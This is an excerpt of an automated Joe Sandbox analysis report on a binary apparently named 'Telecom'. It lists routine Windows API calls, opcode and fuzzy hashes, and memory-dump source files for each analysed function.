                                                      • Opcode ID: 179285d5d263f3f67fc1af46561a82c598ea5e5c220612a8deb1e5ba55e0a3a1
                                                      • Instruction ID: 9bc7296a8e5094c4bc7d36c519fc768febd89a2cff41ac80f64b15c30fbeadeb
                                                      • Opcode Fuzzy Hash: 179285d5d263f3f67fc1af46561a82c598ea5e5c220612a8deb1e5ba55e0a3a1
                                                      • Instruction Fuzzy Hash: 80F03A70A402947AE7310B136C08FB72FBDD7D6F10F00842EB914A7260C2690869EAB4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00485287
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00446299
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                      • String ID: Line %d: $AutoIt - $s#s#
                                                      • API String ID: 2289894680-316160236
                                                      • Opcode ID: bf3762a8db8dc0f9fa39ba35e48f210d255fad65bc3e2daed0c06a1cefc8a018
                                                      • Instruction ID: 65aafb1828fcc91a9b1dbf1f8c87ae32374652df37bdc406c81a7267f21ec233
                                                      • Opcode Fuzzy Hash: bf3762a8db8dc0f9fa39ba35e48f210d255fad65bc3e2daed0c06a1cefc8a018
                                                      • Instruction Fuzzy Hash: BD41C471408310AAD711FB21EC41ADF77DCAF55318F00492FF99592191EF789649CB9B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,OVH,0047894C,?,00509CE8,0000000C,004789AB,?,OVH,?,0048564F), ref: 00478A84
                                                      • GetLastError.KERNEL32 ref: 00478A8E
                                                      • __dosmaperr.LIBCMT ref: 00478AB9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                      • String ID: OVH
                                                      • API String ID: 490808831-274800799
                                                      • Opcode ID: 0c00629cdfd8b06044454701e7e17b6f09b0ae7eaad66e779b3abc94f0b2fbd9
                                                      • Instruction ID: 82632825f305abf8802fd085a06a3a4276c74e581b990e0eb32b55f7f8789cc7
                                                      • Opcode Fuzzy Hash: 0c00629cdfd8b06044454701e7e17b6f09b0ae7eaad66e779b3abc94f0b2fbd9
                                                      • Instruction Fuzzy Hash: DB018E326465A01AC6246334AC4E7FF27494B92738F25812FF91C8F2C2DF7C8C81419D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004458BE,SwapMouseButtons,00000004,?), ref: 004458EF
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004458BE,SwapMouseButtons,00000004,?), ref: 00445910
                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,004458BE,SwapMouseButtons,00000004,?), ref: 00445932
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: b99d44bca7f168d9e0e91723411c37cdfb6e7327a843194b0a7e0a108bfecd11
                                                      • Instruction ID: 40b2b5b6132cc680ee33f3fafa783469f1f078e371402264cf5b23fb4f843865
                                                      • Opcode Fuzzy Hash: b99d44bca7f168d9e0e91723411c37cdfb6e7327a843194b0a7e0a108bfecd11
                                                      • Instruction Fuzzy Hash: 6E117CB5511618FFEF218F64DC81EAFBBB8EF45764F10842AF801E7210E6359E419768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,004DDC30), ref: 004ADBA6
                                                      • GetLastError.KERNEL32 ref: 004ADBB5
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 004ADBC4
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004DDC30), ref: 004ADC21
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 54ee008c49fa238a94eec59938561a9863f62c082a4a2e733a0d1bdfdf1a7506
                                                      • Instruction ID: 2f2324b38bf3f3b03f6ad2e2fe456cdaf4ea6b36c194af8d695249ac9e81aa9e
                                                      • Opcode Fuzzy Hash: 54ee008c49fa238a94eec59938561a9863f62c082a4a2e733a0d1bdfdf1a7506
                                                      • Instruction Fuzzy Hash: 3D21E7709443019F8710DF24C88086BB7E8EF67764F500A1FF49AC72A1D734D946CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00453006
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CALL$bnJ
                                                      • API String ID: 1385522511-3433157237
                                                      • Opcode ID: 9c33fbf87b67effe210aa378ff118a9e0a0c0abff454fa03b7c79cdfc7168f92
                                                      • Instruction ID: e924f2048f7037fee93b2bc234474a235dab3978b92d653a835bb6664bfaab09
                                                      • Opcode Fuzzy Hash: 9c33fbf87b67effe210aa378ff118a9e0a0c0abff454fa03b7c79cdfc7168f92
                                                      • Instruction Fuzzy Hash: 77229D706083019FC714CF25C481A2ABBF1BF95315F14895FF8958B3A2D779E949CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0048413B
                                                        • Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871
                                                        • Part of subcall function 00443A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00443A76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen
                                                      • String ID: X$`uP
                                                      • API String ID: 779396738-2430950425
                                                      • Opcode ID: 405018cce4391e96c4e351dd72223ee7afda92f3f5cce19dc0443001dc37d689
                                                      • Instruction ID: a9a3b218ece0a80bd29fe9b050fb20a6e032c66f7d91c6d06e631a870a7b0531
                                                      • Opcode Fuzzy Hash: 405018cce4391e96c4e351dd72223ee7afda92f3f5cce19dc0443001dc37d689
                                                      • Instruction Fuzzy Hash: 20218171A0025C9BDF01DF95C805BEE7BF8AF49718F00805AE545B7281DBF89A898F69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004609D8
                                                        • Part of subcall function 00463614: RaiseException.KERNEL32(?,?,?,004609FA,?,00000000,?,?,?,?,?,?,004609FA,00000000,00509758,00000000), ref: 00463674
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004609F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: 43daa725523746c5b6f374e25af65388c25fe189ece617816860ce1d10ee6b2d
                                                      • Instruction ID: bd4cdb2174e7360007873bf5e91c3fc3f8e6e11a745bea48721e39bbb137574e
                                                      • Opcode Fuzzy Hash: 43daa725523746c5b6f374e25af65388c25fe189ece617816860ce1d10ee6b2d
                                                      • Instruction Fuzzy Hash: C1F0287490020CB7CF10BAAADC0289F776C5E01358B50402BB924961E2FB79EA1AC6DB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004C8D52
                                                      • TerminateProcess.KERNEL32(00000000), ref: 004C8D59
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 004C8F3A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                      • String ID:
                                                      • API String ID: 146820519-0
                                                      • Opcode ID: c3e8b7bc86842aedc9e73ca2e20c43c546409bb30fc3d9fa381a66b11896fc8c
                                                      • Instruction ID: 5d9921dfd74f9584e22920d594df39277c1afcbd79e4e234c54aee8a28b08d10
                                                      • Opcode Fuzzy Hash: c3e8b7bc86842aedc9e73ca2e20c43c546409bb30fc3d9fa381a66b11896fc8c
                                                      • Instruction Fuzzy Hash: 05127B75A083009FD750DF28C484B6ABBE1FF85318F14895EE8898B352CB39ED45CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_strcat
                                                      • String ID:
                                                      • API String ID: 306214811-0
                                                      • Opcode ID: b6534f638207c27b1a19e3a31c5f12b49e4d27ef4ef2eea58cf7414f193263fb
                                                      • Instruction ID: 2e2c588e32121d3d0ad8d3f661712251a4b7913a93e30d8087a0db539d869d14
                                                      • Opcode Fuzzy Hash: b6534f638207c27b1a19e3a31c5f12b49e4d27ef4ef2eea58cf7414f193263fb
                                                      • Instruction Fuzzy Hash: 83A18C34600505EFCB58DF19C5D5A69B7A1FF45318B2484AEE80A8F392DB39ED42CF89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001,?,00000000), ref: 00446DEE
                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00446DFE
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: b75c6c9d3be39195151941a71bc7d97ee44ee85420d740dcc3a82e749786203a
                                                      • Instruction ID: 612f212cc6510a41d2de4f0691a26e8233863a539e642c1a0e380889f90bbdc6
                                                      • Opcode Fuzzy Hash: b75c6c9d3be39195151941a71bc7d97ee44ee85420d740dcc3a82e749786203a
                                                      • Instruction Fuzzy Hash: EB318B71A00609EFEB14CF28C880B99B7B4FB48314F15862AE91497340C7B5FEA4DB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004461A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00446299
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 0045FD36
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0045FD45
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0049FE33
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer$Kill
                                                      • String ID:
                                                      • API String ID: 3500052701-0
                                                      • Opcode ID: 33cd7f4c23813cb57d07ebc3febb2b846ffb5e5901b4e0e22b504304e6e663a1
                                                      • Instruction ID: e735645ed16662dbdc19fc979628968a36c52182138b7d9f21895053f1c25aa5
                                                      • Opcode Fuzzy Hash: 33cd7f4c23813cb57d07ebc3febb2b846ffb5e5901b4e0e22b504304e6e663a1
                                                      • Instruction Fuzzy Hash: 3D318471904344AFEF228F248855BE7BFEC9B16308F0044AFD59A97242D3781A8DCB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,004797BA,FF8BC369,00000000,00000002,00000000), ref: 00479744
                                                      • GetLastError.KERNEL32(?,004797BA,FF8BC369,00000000,00000002,00000000,?,00475ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00466F41), ref: 0047974E
                                                      • __dosmaperr.LIBCMT ref: 00479755
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2336955059-0
                                                      • Opcode ID: 87f9eecf6e9a4a14f17a9e1c95bd8890a0f724d26739ffc35c735400532c933d
                                                      • Instruction ID: 1c8b9b404f5d09a643e5a4fc08f97a9400f7cc914e12d74be1fa59ecea1a2d1f
                                                      • Opcode Fuzzy Hash: 87f9eecf6e9a4a14f17a9e1c95bd8890a0f724d26739ffc35c735400532c933d
                                                      • Instruction Fuzzy Hash: 2B014032620514EBCB099F99DC05CEF3729DB85330F24425BF8159B290E674DD429795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00443462,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004442A0
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FullNamePath_wcslen
                                                      • String ID: $Q
                                                      • API String ID: 4019309064-162862168
                                                      • Opcode ID: be1c8d003a2cd88320748d7453ec557e8d8a9aa8b9d071a2168e6329ec527edc
                                                      • Instruction ID: 07534cbc1114ab882b21d66071e285bd9fe26cd1df61260940abefd1e388c897
                                                      • Opcode Fuzzy Hash: be1c8d003a2cd88320748d7453ec557e8d8a9aa8b9d071a2168e6329ec527edc
                                                      • Instruction Fuzzy Hash: 62115231900219AAEF10EB658901FDD77E8BF48398F4044ABB94597291DEB8D7C4972D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,0044AF30,?,?,?), ref: 0044B0EC
                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,0044AF30,?,?,?), ref: 0049072B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: File$PointerRead
                                                      • String ID:
                                                      • API String ID: 3154509469-0
                                                      • Opcode ID: 1898cd08a5294a1d9cfbd4b67a725aa326c8e924a0f0e0b4d460bf040b6e92a5
                                                      • Instruction ID: f9640dd33a942d56d4d43659aed234e3ffdf40b958b2dd953897f5dd137109b5
                                                      • Opcode Fuzzy Hash: 1898cd08a5294a1d9cfbd4b67a725aa326c8e924a0f0e0b4d460bf040b6e92a5
                                                      • Instruction Fuzzy Hash: 7E91D170904205EFEF10CF65C8817AABBB4FF05310F1481A6E8259B385D77AE951DBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNEL32 ref: 0046007D
                                                      • TerminateProcess.KERNEL32 ref: 0046008F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotificationProcessTerminate
                                                      • String ID:
                                                      • API String ID: 630213059-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: bd8e185c30cb8d7b1350b49b76d00313cd4eff534e87af57d4b5a78681d32bd9
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 1931B571A00105DFD718DF58E490A6AFBA5FB59300B2486A6E409CB752E736EDC1CBC6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00443A3C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 43090afe19d1a5cad9650acc61d455636083ced52045943e8b963b431e561f9a
                                                      • Instruction ID: 300d78a4e2b71faf24985a6e36bb0fdaddc4eb952fc81a6071abbbad8910790e
                                                      • Opcode Fuzzy Hash: 43090afe19d1a5cad9650acc61d455636083ced52045943e8b963b431e561f9a
                                                      • Instruction Fuzzy Hash: AF31AEB06043019FE720DF24D884797BBE8FB59709F00092EE5DA97341E7B8AA58CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004AD559
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 004AD58D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
